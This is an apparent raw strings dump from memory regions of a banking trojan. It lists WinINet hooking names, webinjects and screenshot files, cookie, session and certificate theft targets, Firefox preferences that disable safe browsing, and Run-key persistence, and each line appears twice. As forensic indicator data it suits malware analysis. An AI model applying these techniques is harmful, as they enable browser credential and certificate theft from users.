HTTP_QUERY_CONTENT_DESCRIPTION
HTTP_QUERY_CONTENT_DESCRIPTION
HTTP_QUERY_CONTENT_ID
HTTP_QUERY_CONTENT_ID
HTTP_QUERY_CONTENT_TRANSFER_ENCODING
HTTP_QUERY_CONTENT_TRANSFER_ENCODING
HTTP_QUERY_CONTENT_TYPE
HTTP_QUERY_CONTENT_TYPE
HTTP_QUERY_MIME_VERSION
HTTP_QUERY_MIME_VERSION
Content-Length: %u
Content-Length: %u
HTTP/
HTTP/
SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
\\.\pipe\globpluginsuninstallpipe
\\.\pipe\globpluginsuninstallpipe
cookies-nontor.xml
cookies-nontor.xml
cookies.txt
cookies.txt
sessionstore.js
sessionstore.js
sessionstore.bak
sessionstore.bak
cookies.sqlite-journal
cookies.sqlite-journal
cookies.sqlite
cookies.sqlite
GdiplusShutdown
GdiplusShutdown
gdiplus.dll
gdiplus.dll
\\.\pipe\processingpipe_
\\.\pipe\processingpipe_
services.exe
services.exe
csrss.exe
csrss.exe
smss.exe
smss.exe
\\.\pipe\globpluginspipe
\\.\pipe\globpluginspipe
X X
X X
user_pref("browser.safebrowsing.enabled", false);
user_pref("browser.safebrowsing.enabled", false);
user_pref("browser.safebrowsing.malware.enabled", false);
user_pref("browser.safebrowsing.malware.enabled", false);
user_pref("security.warn_entering_weak", false);
user_pref("security.warn_entering_weak", false);
user_pref("security.warn_entering_weak.show_once", false);
user_pref("security.warn_entering_weak.show_once", false);
user_pref("security.warn_viewing_mixed", false);
user_pref("security.warn_viewing_mixed", false);
user_pref("security.warn_viewing_mixed.show_once", false);
user_pref("security.warn_viewing_mixed.show_once", false);
user_pref("privacy.clearOnShutdown.cookies", false);
user_pref("privacy.clearOnShutdown.cookies", false);
user_pref("privacy.clearOnShutdown.sessions", false);
user_pref("privacy.clearOnShutdown.sessions", false);
/Mozilla/Firefox/profiles.ini
/Mozilla/Firefox/profiles.ini
/Mozilla/Firefox/
/Mozilla/Firefox/
nspr4.dll
nspr4.dll
seieapiXX
seieapiXX
%s\Content.IE5\0
%s\Content.IE5\0
%s\Content.IE5\%s
%s\Content.IE5\%s
\Content.IE5\*.*
\Content.IE5\*.*
set_url
set_url
PFXImportCertStore
PFXImportCertStore
user32.dll
user32.dll
%d.%d.%d
%d.%d.%d
keys
keys
http:
http:
urlmask
urlmask
cert
cert
%s%s%s
%s%s%s
[ERROR] : CreateProcess("%s", ..., "%s") fails : dwFileSize == 0xX; dwCrc32 == 0xX : dwErr == %d
[ERROR] : CreateProcess("%s", ..., "%s") fails : dwFileSize == 0xX; dwCrc32 == 0xX : dwErr == %d
[ERROR] : DumpPage("%s", "%s") fails : dwErr == %d
[ERROR] : DumpPage("%s", "%s") fails : dwErr == %d
[ERROR] : Empty szLink? : dwErr == %d
[ERROR] : Empty szLink? : dwErr == %d
[ERROR] : Empty report. Unknown error : dwErr == %d
[ERROR] : Empty report. Unknown error : dwErr == %d
[ERROR] : Thread is really sloppy : dwErr == %d
[ERROR] : Thread is really sloppy : dwErr == %d
[ERROR] : Cannot create thread. 0o : dwErr == %d
[ERROR] : Cannot create thread. 0o : dwErr == %d
%d-%d-%d
%d-%d-%d
collectors.txt
collectors.txt
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\%d
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\%d
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%d
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%d
ProxyHttp1.1
ProxyHttp1.1
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
EnableHttp1_1
EnableHttp1_1
HttpSendRequestA
HttpSendRequestA
HttpSendRequestW
HttpSendRequestW
hXXp://
hXXp://
hXXps://
hXXps://
HTTP/1.
HTTP/1.
.mpeg
.mpeg
.jpeg
.jpeg
%s&tid=%s&%s
%s&tid=%s&%s
TakeBotExeMd5Callback
TakeBotExeMd5Callback
TakeOriginal_HttpSendRequestW
TakeOriginal_HttpSendRequestW
TakeOriginal_HttpSendRequestA
TakeOriginal_HttpSendRequestA
TakeOriginal_HttpOpenRequestA
TakeOriginal_HttpOpenRequestA
TakeOriginal_HttpAddRequestHeadersA
TakeOriginal_HttpAddRequestHeadersA
Callback_OnBeforeProcessUrl
Callback_OnBeforeProcessUrl
HttpQueryInfoA
HttpQueryInfoA
HttpAddRequestHeadersA
HttpAddRequestHeadersA
HttpOpenRequestA
HttpOpenRequestA
wlcomm.exe
wlcomm.exe
msmsgs.exe
msmsgs.exe
msnmsgr.exe
msnmsgr.exe
PR_OpenTCPSocket
PR_OpenTCPSocket
kernel32.dll
kernel32.dll
Crypt32.dll
Crypt32.dll
Advapi32.dll
Advapi32.dll
ws2_32.dll
ws2_32.dll
wininet.dll
wininet.dll
Ht.Ht!HHt
Ht.Ht!HHt
w SSh
w SSh
SSSSh
SSSSh
t.VPW
t.VPW
%System%\WININET.dll
%System%\WININET.dll
C:\trivax1.Bin\config.bin
C:\trivax1.Bin\config.bin
%System%\ntdll.dll
%System%\ntdll.dll
%System%\USER32.dll
%System%\USER32.dll
%System%\CRYPT32.dll
%System%\CRYPT32.dll
C:\trivax1.Bin\trivax1.Bin.exe
C:\trivax1.Bin\trivax1.Bin.exe
C:\trivax1.Bin\
C:\trivax1.Bin\
trivax1.Bin.exe
trivax1.Bin.exe
config.bin
config.bin
o0Iu6US.exe
o0Iu6US.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
5.1.2600!XP7!A8A67A25
5.1.2600!XP7!A8A67A25
trivax1.Bin
trivax1.Bin
Microsoft Windows
Microsoft Windows
%System%\ADVAPI32.dll
%System%\ADVAPI32.dll
c:\windows\system32\WS2_32.dll
c:\windows\system32\WS2_32.dll
PFXExportCertStoreEx
PFXExportCertStoreEx
CertCloseStore
CertCloseStore
CertAddCertificateContextToStore
CertAddCertificateContextToStore
CertOpenStore
CertOpenStore
CertGetCertificateContextProperty
CertGetCertificateContextProperty
CertDeleteCertificateFromStore
CertDeleteCertificateFromStore
CertDuplicateCertificateContext
CertDuplicateCertificateContext
CertNameToStrA
CertNameToStrA
CertEnumCertificatesInStore
CertEnumCertificatesInStore
CertOpenSystemStoreA
CertOpenSystemStoreA
CRYPT32.dll
CRYPT32.dll
ntdll.dll
ntdll.dll
WS2_32.dll
WS2_32.dll
FindCloseUrlCache
FindCloseUrlCache
FindNextUrlCacheEntryA
FindNextUrlCacheEntryA
DeleteUrlCacheEntry
DeleteUrlCacheEntry
FindFirstUrlCacheEntryA
FindFirstUrlCacheEntryA
InternetCrackUrlA
InternetCrackUrlA
InternetCanonicalizeUrlA
InternetCanonicalizeUrlA
GetUrlCacheEntryInfoW
GetUrlCacheEntryInfoW
WININET.dll
WININET.dll
SHLWAPI.dll
SHLWAPI.dll
GetProcessHeap
GetProcessHeap
DisconnectNamedPipe
DisconnectNamedPipe
ConnectNamedPipe
ConnectNamedPipe
CreateNamedPipeA
CreateNamedPipeA
WaitNamedPipeA
WaitNamedPipeA
KERNEL32.dll
KERNEL32.dll
GetKeyboardState
GetKeyboardState
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
EnumWindows
EnumWindows
GetKeyState
GetKeyState
USER32.dll
USER32.dll
GDI32.dll
GDI32.dll
RegCloseKey
RegCloseKey
RegCreateKeyExA
RegCreateKeyExA
RegOpenKeyExA
RegOpenKeyExA
CryptDestroyKey
CryptDestroyKey
CryptGetKeyParam
CryptGetKeyParam
CryptGetUserKey
CryptGetUserKey
ADVAPI32.dll
ADVAPI32.dll
SHELL32.dll
SHELL32.dll
ole32.dll
ole32.dll
3-33383|3
3-33383|3
6"6(6-676
6"6(6-676
RapportUtil.
RapportUtil.
(GMT %su:u) %s
(GMT %su:u) %s
\prefs.js
\prefs.js
RapportTanzan36.
RapportTanzan36.
RapportKoan.
RapportKoan.
spoolsv.exe_1424_rwx_0BAD0000_00045000:
.text
.text
.reloc
.reloc
config.dat
config.dat
explorer.exe
explorer.exe
webinjects.txt
webinjects.txt
screenshots.txt
screenshots.txt
threadmetadata!nfo%d
threadmetadata!nfo%d
XX
XX
SOFTWARE\Microsoft Windows
SOFTWARE\Microsoft Windows
u.u.u u:u:u.u
u.u.u u:u:u.u
0xx
0xx
(%d bytes)
(%d bytes)
INTERNET_FLAG_PASSIVE
INTERNET_FLAG_PASSIVE
INTERNET_FLAG_IGNORE_CERT_CN_INVALID
INTERNET_FLAG_IGNORE_CERT_CN_INVALID
INTERNET_FLAG_IGNORE_CERT_DATE_INVALID
INTERNET_FLAG_IGNORE_CERT_DATE_INVALID
INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS
INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS
INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP
INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP
INTERNET_OPTION_SERVER_CERT_CHAIN_CONTEXT
INTERNET_OPTION_SERVER_CERT_CHAIN_CONTEXT
INTERNET_OPTION_ENABLE_PASSPORT_AUTH
INTERNET_OPTION_ENABLE_PASSPORT_AUTH
INTERNET_OPTION_EXEMPT_CONNECTION_LIMIT
INTERNET_OPTION_EXEMPT_CONNECTION_LIMIT
INTERNET_OPTION_DISABLE_PASSPORT_AUTH
INTERNET_OPTION_DISABLE_PASSPORT_AUTH
INTERNET_OPTION_CLIENT_CERT_CONTEXT
INTERNET_OPTION_CLIENT_CERT_CONTEXT
INTERNET_OPTION_HTTP_DECODING
INTERNET_OPTION_HTTP_DECODING
INTERNET_OPTION_BYPASS_EDITED_ENTRY
INTERNET_OPTION_BYPASS_EDITED_ENTRY
INTERNET_OPTION_RESET_URLCACHE_SESSION
INTERNET_OPTION_RESET_URLCACHE_SESSION
INTERNET_OPTION_HTTP_VERSION
INTERNET_OPTION_HTTP_VERSION
INTERNET_OPTION_SECONDARY_CACHE_KEY
INTERNET_OPTION_SECONDARY_CACHE_KEY
INTERNET_OPTION_SECURITY_SELECT_CLIENT_CERT
INTERNET_OPTION_SECURITY_SELECT_CLIENT_CERT
INTERNET_OPTION_PROXY_PASSWORD
INTERNET_OPTION_PROXY_PASSWORD
INTERNET_OPTION_SECURITY_KEY_BITNESS
INTERNET_OPTION_SECURITY_KEY_BITNESS
INTERNET_OPTION_SECURITY_CERTIFICATE
INTERNET_OPTION_SECURITY_CERTIFICATE
INTERNET_OPTION_URL
INTERNET_OPTION_URL
INTERNET_OPTION_SECURITY_CERTIFICATE_STRUCT
INTERNET_OPTION_SECURITY_CERTIFICATE_STRUCT
INTERNET_OPTION_PASSWORD
INTERNET_OPTION_PASSWORD
HTTP_QUERY_FLAG_COALESCE
HTTP_QUERY_FLAG_COALESCE
HTTP_QUERY_FLAG_NUMBER
HTTP_QUERY_FLAG_NUMBER
HTTP_QUERY_FLAG_SYSTEMTIME
HTTP_QUERY_FLAG_SYSTEMTIME
HTTP_QUERY_FLAG_REQUEST_HEADERS
HTTP_QUERY_FLAG_REQUEST_HEADERS
HTTP_QUERY_UNKNOWN
HTTP_QUERY_UNKNOWN
HTTP_QUERY_CUSTOM
HTTP_QUERY_CUSTOM
HTTP_QUERY_PASSPORT_CONFIG
HTTP_QUERY_PASSPORT_CONFIG
HTTP_QUERY_PASSPORT_URLS
HTTP_QUERY_PASSPORT_URLS
HTTP_QUERY_AUTHENTICATION_INFO
HTTP_QUERY_AUTHENTICATION_INFO
HTTP_QUERY_PROXY_SUPPORT
HTTP_QUERY_PROXY_SUPPORT
HTTP_QUERY_ECHO_HEADERS_CRLF
HTTP_QUERY_ECHO_HEADERS_CRLF
HTTP_QUERY_ECHO_HEADERS
HTTP_QUERY_ECHO_HEADERS
HTTP_QUERY_ECHO_REPLY
HTTP_QUERY_ECHO_REPLY
HTTP_QUERY_ECHO_REQUEST
HTTP_QUERY_ECHO_REQUEST
HTTP_QUERY_UNLESS_MODIFIED_SINCE
HTTP_QUERY_UNLESS_MODIFIED_SINCE
HTTP_QUERY_PROXY_CONNECTION
HTTP_QUERY_PROXY_CONNECTION
HTTP_QUERY_EXPECT
HTTP_QUERY_EXPECT
HTTP_QUERY_WARNING
HTTP_QUERY_WARNING
HTTP_QUERY_VIA
HTTP_QUERY_VIA
HTTP_QUERY_VARY
HTTP_QUERY_VARY
HTTP_QUERY_UPGRADE
HTTP_QUERY_UPGRADE
HTTP_QUERY_TRANSFER_ENCODING
HTTP_QUERY_TRANSFER_ENCODING
HTTP_QUERY_RANGE
HTTP_QUERY_RANGE
HTTP_QUERY_PROXY_AUTHORIZATION
HTTP_QUERY_PROXY_AUTHORIZATION
HTTP_QUERY_MAX_FORWARDS
HTTP_QUERY_MAX_FORWARDS
HTTP_QUERY_IF_UNMODIFIED_SINCE
HTTP_QUERY_IF_UNMODIFIED_SINCE
HTTP_QUERY_IF_RANGE
HTTP_QUERY_IF_RANGE
HTTP_QUERY_IF_NONE_MATCH
HTTP_QUERY_IF_NONE_MATCH
HTTP_QUERY_IF_MATCH
HTTP_QUERY_IF_MATCH
HTTP_QUERY_HOST
HTTP_QUERY_HOST
HTTP_QUERY_ETAG
HTTP_QUERY_ETAG
HTTP_QUERY_CONTENT_RANGE
HTTP_QUERY_CONTENT_RANGE
HTTP_QUERY_CONTENT_MD5
HTTP_QUERY_CONTENT_MD5
HTTP_QUERY_CONTENT_LOCATION
HTTP_QUERY_CONTENT_LOCATION
HTTP_QUERY_CONTENT_BASE
HTTP_QUERY_CONTENT_BASE
HTTP_QUERY_CACHE_CONTROL
HTTP_QUERY_CACHE_CONTROL
HTTP_QUERY_AGE
HTTP_QUERY_AGE
HTTP_QUERY_CONTENT_DISPOSITION
HTTP_QUERY_CONTENT_DISPOSITION
HTTP_QUERY_REFRESH
HTTP_QUERY_REFRESH
HTTP_QUERY_REQUEST_METHOD
HTTP_QUERY_REQUEST_METHOD
HTTP_QUERY_COOKIE
HTTP_QUERY_COOKIE
HTTP_QUERY_SET_COOKIE
HTTP_QUERY_SET_COOKIE
HTTP_QUERY_ACCEPT_RANGES
HTTP_QUERY_ACCEPT_RANGES
HTTP_QUERY_PROXY_AUTHENTICATE
HTTP_QUERY_PROXY_AUTHENTICATE
HTTP_QUERY_WWW_AUTHENTICATE
HTTP_QUERY_WWW_AUTHENTICATE
HTTP_QUERY_USER_AGENT
HTTP_QUERY_USER_AGENT
HTTP_QUERY_TITLE
HTTP_QUERY_TITLE
HTTP_QUERY_SERVER
HTTP_QUERY_SERVER
HTTP_QUERY_RETRY_AFTER
HTTP_QUERY_RETRY_AFTER
HTTP_QUERY_REFERER
HTTP_QUERY_REFERER
HTTP_QUERY_ORIG_URI
HTTP_QUERY_ORIG_URI
HTTP_QUERY_LOCATION
HTTP_QUERY_LOCATION
HTTP_QUERY_IF_MODIFIED_SINCE
HTTP_QUERY_IF_MODIFIED_SINCE
HTTP_QUERY_FROM
HTTP_QUERY_FROM
HTTP_QUERY_FORWARDED
HTTP_QUERY_FORWARDED
HTTP_QUERY_CONTENT_ENCODING
HTTP_QUERY_CONTENT_ENCODING
HTTP_QUERY_AUTHORIZATION
HTTP_QUERY_AUTHORIZATION
HTTP_QUERY_ACCEPT_LANGUAGE
HTTP_QUERY_ACCEPT_LANGUAGE
HTTP_QUERY_ACCEPT_ENCODING
HTTP_QUERY_ACCEPT_ENCODING
HTTP_QUERY_ACCEPT_CHARSET
HTTP_QUERY_ACCEPT_CHARSET
HTTP_QUERY_ACCEPT
HTTP_QUERY_ACCEPT
HTTP_QUERY_CONNECTION
HTTP_QUERY_CONNECTION
HTTP_QUERY_RAW_HEADERS_CRLF
HTTP_QUERY_RAW_HEADERS_CRLF
HTTP_QUERY_RAW_HEADERS
HTTP_QUERY_RAW_HEADERS
HTTP_QUERY_STATUS_TEXT
HTTP_QUERY_STATUS_TEXT
HTTP_QUERY_STATUS_CODE
HTTP_QUERY_STATUS_CODE
HTTP_QUERY_VERSION
HTTP_QUERY_VERSION
HTTP_QUERY_PRAGMA
HTTP_QUERY_PRAGMA
HTTP_QUERY_LINK
HTTP_QUERY_LINK
HTTP_QUERY_COST
HTTP_QUERY_COST
HTTP_QUERY_DERIVED_FROM
HTTP_QUERY_DERIVED_FROM
HTTP_QUERY_URI
HTTP_QUERY_URI
HTTP_QUERY_MESSAGE_ID
HTTP_QUERY_MESSAGE_ID
HTTP_QUERY_LAST_MODIFIED
HTTP_QUERY_LAST_MODIFIED
HTTP_QUERY_EXPIRES
HTTP_QUERY_EXPIRES
HTTP_QUERY_DATE
HTTP_QUERY_DATE
HTTP_QUERY_PUBLIC
HTTP_QUERY_PUBLIC
HTTP_QUERY_ALLOW
HTTP_QUERY_ALLOW
HTTP_QUERY_CONTENT_LANGUAGE
HTTP_QUERY_CONTENT_LANGUAGE
HTTP_QUERY_CONTENT_LENGTH
HTTP_QUERY_CONTENT_LENGTH
HTTP_QUERY_CONTENT_DESCRIPTION
HTTP_QUERY_CONTENT_DESCRIPTION
HTTP_QUERY_CONTENT_ID
HTTP_QUERY_CONTENT_ID
HTTP_QUERY_CONTENT_TRANSFER_ENCODING
HTTP_QUERY_CONTENT_TRANSFER_ENCODING
HTTP_QUERY_CONTENT_TYPE
HTTP_QUERY_CONTENT_TYPE
HTTP_QUERY_MIME_VERSION
HTTP_QUERY_MIME_VERSION
Content-Length: %u
Content-Length: %u
HTTP/
HTTP/
SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
\\.\pipe\globpluginsuninstallpipe
\\.\pipe\globpluginsuninstallpipe
cookies-nontor.xml
cookies-nontor.xml
cookies.txt
cookies.txt
sessionstore.js
sessionstore.js
sessionstore.bak
sessionstore.bak
cookies.sqlite-journal
cookies.sqlite-journal
cookies.sqlite
cookies.sqlite
GdiplusShutdown
GdiplusShutdown
gdiplus.dll
gdiplus.dll
\\.\pipe\processingpipe_
\\.\pipe\processingpipe_
services.exe
services.exe
csrss.exe
csrss.exe
smss.exe
smss.exe
\\.\pipe\globpluginspipe
\\.\pipe\globpluginspipe
X X
X X
user_pref("browser.safebrowsing.enabled", false);
user_pref("browser.safebrowsing.enabled", false);
user_pref("browser.safebrowsing.malware.enabled", false);
user_pref("browser.safebrowsing.malware.enabled", false);
user_pref("security.warn_entering_weak", false);
user_pref("security.warn_entering_weak", false);
user_pref("security.warn_entering_weak.show_once", false);
user_pref("security.warn_entering_weak.show_once", false);
user_pref("security.warn_viewing_mixed", false);
user_pref("security.warn_viewing_mixed", false);
user_pref("security.warn_viewing_mixed.show_once", false);
user_pref("security.warn_viewing_mixed.show_once", false);
user_pref("privacy.clearOnShutdown.cookies", false);
user_pref("privacy.clearOnShutdown.cookies", false);
user_pref("privacy.clearOnShutdown.sessions", false);
user_pref("privacy.clearOnShutdown.sessions", false);
/Mozilla/Firefox/profiles.ini
/Mozilla/Firefox/profiles.ini
/Mozilla/Firefox/
/Mozilla/Firefox/
nspr4.dll
nspr4.dll
seieapiXX
seieapiXX
%s\Content.IE5\0
%s\Content.IE5\0
%s\Content.IE5\%s
%s\Content.IE5\%s
\Content.IE5\*.*
\Content.IE5\*.*
set_url
set_url
PFXImportCertStore
PFXImportCertStore
user32.dll
user32.dll
%d.%d.%d
%d.%d.%d
keys
keys
http:
http:
urlmask
urlmask
cert
cert
%s%s%s
%s%s%s
[ERROR] : CreateProcess("%s", ..., "%s") fails : dwFileSize == 0xX; dwCrc32 == 0xX : dwErr == %d
[ERROR] : CreateProcess("%s", ..., "%s") fails : dwFileSize == 0xX; dwCrc32 == 0xX : dwErr == %d
[ERROR] : DumpPage("%s", "%s") fails : dwErr == %d
[ERROR] : DumpPage("%s", "%s") fails : dwErr == %d
[ERROR] : Empty szLink? : dwErr == %d
[ERROR] : Empty szLink? : dwErr == %d
[ERROR] : Empty report. Unknown error : dwErr == %d
[ERROR] : Empty report. Unknown error : dwErr == %d
[ERROR] : Thread is really sloppy : dwErr == %d
[ERROR] : Thread is really sloppy : dwErr == %d
[ERROR] : Cannot create thread. 0o : dwErr == %d
[ERROR] : Cannot create thread. 0o : dwErr == %d
%d-%d-%d
%d-%d-%d
collectors.txt
collectors.txt
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\%d
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\%d
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%d
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%d
ProxyHttp1.1
ProxyHttp1.1
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
EnableHttp1_1
EnableHttp1_1
HttpSendRequestA
HttpSendRequestA
HttpSendRequestW
HttpSendRequestW
hXXp://
hXXp://
hXXps://
hXXps://
HTTP/1.
HTTP/1.
.mpeg
.mpeg
.jpeg
.jpeg
%s&tid=%s&%s
%s&tid=%s&%s
TakeBotExeMd5Callback
TakeBotExeMd5Callback
TakeOriginal_HttpSendRequestW
TakeOriginal_HttpSendRequestW
TakeOriginal_HttpSendRequestA
TakeOriginal_HttpSendRequestA
TakeOriginal_HttpOpenRequestA
TakeOriginal_HttpOpenRequestA
TakeOriginal_HttpAddRequestHeadersA
TakeOriginal_HttpAddRequestHeadersA
Callback_OnBeforeProcessUrl
Callback_OnBeforeProcessUrl
HttpQueryInfoA
HttpQueryInfoA
HttpAddRequestHeadersA
HttpAddRequestHeadersA
HttpOpenRequestA
HttpOpenRequestA
wlcomm.exe
wlcomm.exe
msmsgs.exe
msmsgs.exe
msnmsgr.exe
msnmsgr.exe
PR_OpenTCPSocket
PR_OpenTCPSocket
kernel32.dll
kernel32.dll
Crypt32.dll
Crypt32.dll
Advapi32.dll
Advapi32.dll
ws2_32.dll
ws2_32.dll
wininet.dll
wininet.dll
Ht.Ht!HHt
Ht.Ht!HHt
w SSh
w SSh
SSSSh
SSSSh
t.VPW
t.VPW
%System%\WININET.dll
%System%\WININET.dll
C:\trivax1.Bin\config.bin
C:\trivax1.Bin\config.bin
%System%\ntdll.dll
%System%\ntdll.dll
%System%\USER32.dll
%System%\USER32.dll
%System%\CRYPT32.dll
%System%\CRYPT32.dll
C:\trivax1.Bin\trivax1.Bin.exe
C:\trivax1.Bin\trivax1.Bin.exe
C:\trivax1.Bin\
C:\trivax1.Bin\
trivax1.Bin.exe
trivax1.Bin.exe
config.bin
config.bin
o0Iu6US.exe
o0Iu6US.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
5.1.2600!XP7!A8A67A25
5.1.2600!XP7!A8A67A25
trivax1.Bin
trivax1.Bin
Microsoft Windows
Microsoft Windows
%System%\ADVAPI32.dll
%System%\ADVAPI32.dll
%System%\WS2_32.dll
%System%\WS2_32.dll
PFXExportCertStoreEx
PFXExportCertStoreEx
CertCloseStore
CertCloseStore
CertAddCertificateContextToStore
CertAddCertificateContextToStore
CertOpenStore
CertOpenStore
CertGetCertificateContextProperty
CertGetCertificateContextProperty
CertDeleteCertificateFromStore
CertDeleteCertificateFromStore
CertDuplicateCertificateContext
CertDuplicateCertificateContext
CertNameToStrA
CertNameToStrA
CertEnumCertificatesInStore
CertEnumCertificatesInStore
CertOpenSystemStoreA
CertOpenSystemStoreA
CRYPT32.dll
CRYPT32.dll
ntdll.dll
ntdll.dll
WS2_32.dll
WS2_32.dll
FindCloseUrlCache
FindCloseUrlCache
FindNextUrlCacheEntryA
FindNextUrlCacheEntryA
DeleteUrlCacheEntry
DeleteUrlCacheEntry
FindFirstUrlCacheEntryA
FindFirstUrlCacheEntryA
InternetCrackUrlA
InternetCrackUrlA
InternetCanonicalizeUrlA
InternetCanonicalizeUrlA
GetUrlCacheEntryInfoW
GetUrlCacheEntryInfoW
WININET.dll
WININET.dll
SHLWAPI.dll
SHLWAPI.dll
GetProcessHeap
GetProcessHeap
DisconnectNamedPipe
DisconnectNamedPipe
ConnectNamedPipe
ConnectNamedPipe
CreateNamedPipeA
CreateNamedPipeA
WaitNamedPipeA
WaitNamedPipeA
KERNEL32.dll
KERNEL32.dll
GetKeyboardState
GetKeyboardState
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
EnumWindows
EnumWindows
GetKeyState
GetKeyState
USER32.dll
USER32.dll
GDI32.dll
GDI32.dll
RegCloseKey
RegCloseKey
RegCreateKeyExA
RegCreateKeyExA
RegOpenKeyExA
RegOpenKeyExA
CryptDestroyKey
CryptDestroyKey
CryptGetKeyParam
CryptGetKeyParam
CryptGetUserKey
CryptGetUserKey
ADVAPI32.dll
ADVAPI32.dll
SHELL32.dll
SHELL32.dll
ole32.dll
ole32.dll
3-33383|3
3-33383|3
6"6(6-676
6"6(6-676
RapportUtil.
RapportUtil.
(GMT %su:u) %s
(GMT %su:u) %s
\prefs.js
\prefs.js
RapportTanzan36.
RapportTanzan36.
RapportKoan.
RapportKoan.
jqs.exe_1640_rwx_0BAD0000_00045000:
.text
.text
.reloc
.reloc
config.dat
config.dat
explorer.exe
explorer.exe
webinjects.txt
webinjects.txt
screenshots.txt
screenshots.txt
threadmetadata!nfo%d
threadmetadata!nfo%d
XX
XX
SOFTWARE\Microsoft Windows
SOFTWARE\Microsoft Windows
u.u.u u:u:u.u
u.u.u u:u:u.u
0xx
0xx
(%d bytes)
(%d bytes)
INTERNET_FLAG_PASSIVE
INTERNET_FLAG_PASSIVE
INTERNET_FLAG_IGNORE_CERT_CN_INVALID
INTERNET_FLAG_IGNORE_CERT_CN_INVALID
INTERNET_FLAG_IGNORE_CERT_DATE_INVALID
INTERNET_FLAG_IGNORE_CERT_DATE_INVALID
INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS
INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS
INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP
INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP
INTERNET_OPTION_SERVER_CERT_CHAIN_CONTEXT
INTERNET_OPTION_SERVER_CERT_CHAIN_CONTEXT
INTERNET_OPTION_ENABLE_PASSPORT_AUTH
INTERNET_OPTION_ENABLE_PASSPORT_AUTH
INTERNET_OPTION_EXEMPT_CONNECTION_LIMIT
INTERNET_OPTION_EXEMPT_CONNECTION_LIMIT
INTERNET_OPTION_DISABLE_PASSPORT_AUTH
INTERNET_OPTION_DISABLE_PASSPORT_AUTH
INTERNET_OPTION_CLIENT_CERT_CONTEXT
INTERNET_OPTION_CLIENT_CERT_CONTEXT
INTERNET_OPTION_HTTP_DECODING
INTERNET_OPTION_HTTP_DECODING
INTERNET_OPTION_BYPASS_EDITED_ENTRY
INTERNET_OPTION_BYPASS_EDITED_ENTRY
INTERNET_OPTION_RESET_URLCACHE_SESSION
INTERNET_OPTION_RESET_URLCACHE_SESSION
INTERNET_OPTION_HTTP_VERSION
INTERNET_OPTION_HTTP_VERSION
INTERNET_OPTION_SECONDARY_CACHE_KEY
INTERNET_OPTION_SECONDARY_CACHE_KEY
INTERNET_OPTION_SECURITY_SELECT_CLIENT_CERT
INTERNET_OPTION_SECURITY_SELECT_CLIENT_CERT
INTERNET_OPTION_PROXY_PASSWORD
INTERNET_OPTION_PROXY_PASSWORD
INTERNET_OPTION_SECURITY_KEY_BITNESS
INTERNET_OPTION_SECURITY_KEY_BITNESS
INTERNET_OPTION_SECURITY_CERTIFICATE
INTERNET_OPTION_SECURITY_CERTIFICATE
INTERNET_OPTION_URL
INTERNET_OPTION_URL
INTERNET_OPTION_SECURITY_CERTIFICATE_STRUCT
INTERNET_OPTION_SECURITY_CERTIFICATE_STRUCT
INTERNET_OPTION_PASSWORD
INTERNET_OPTION_PASSWORD
HTTP_QUERY_FLAG_COALESCE
HTTP_QUERY_FLAG_COALESCE
HTTP_QUERY_FLAG_NUMBER
HTTP_QUERY_FLAG_NUMBER
HTTP_QUERY_FLAG_SYSTEMTIME
HTTP_QUERY_FLAG_SYSTEMTIME
HTTP_QUERY_FLAG_REQUEST_HEADERS
HTTP_QUERY_FLAG_REQUEST_HEADERS
HTTP_QUERY_UNKNOWN
HTTP_QUERY_UNKNOWN
HTTP_QUERY_CUSTOM
HTTP_QUERY_CUSTOM
HTTP_QUERY_PASSPORT_CONFIG
HTTP_QUERY_PASSPORT_CONFIG
HTTP_QUERY_PASSPORT_URLS
HTTP_QUERY_PASSPORT_URLS
HTTP_QUERY_AUTHENTICATION_INFO
HTTP_QUERY_AUTHENTICATION_INFO
HTTP_QUERY_PROXY_SUPPORT
HTTP_QUERY_PROXY_SUPPORT
HTTP_QUERY_ECHO_HEADERS_CRLF
HTTP_QUERY_ECHO_HEADERS_CRLF
HTTP_QUERY_ECHO_HEADERS
HTTP_QUERY_ECHO_HEADERS
HTTP_QUERY_ECHO_REPLY
HTTP_QUERY_ECHO_REPLY
HTTP_QUERY_ECHO_REQUEST
HTTP_QUERY_ECHO_REQUEST
HTTP_QUERY_UNLESS_MODIFIED_SINCE
HTTP_QUERY_UNLESS_MODIFIED_SINCE
HTTP_QUERY_PROXY_CONNECTION
HTTP_QUERY_PROXY_CONNECTION
HTTP_QUERY_EXPECT
HTTP_QUERY_EXPECT
HTTP_QUERY_WARNING
HTTP_QUERY_WARNING
HTTP_QUERY_VIA
HTTP_QUERY_VIA
HTTP_QUERY_VARY
HTTP_QUERY_VARY
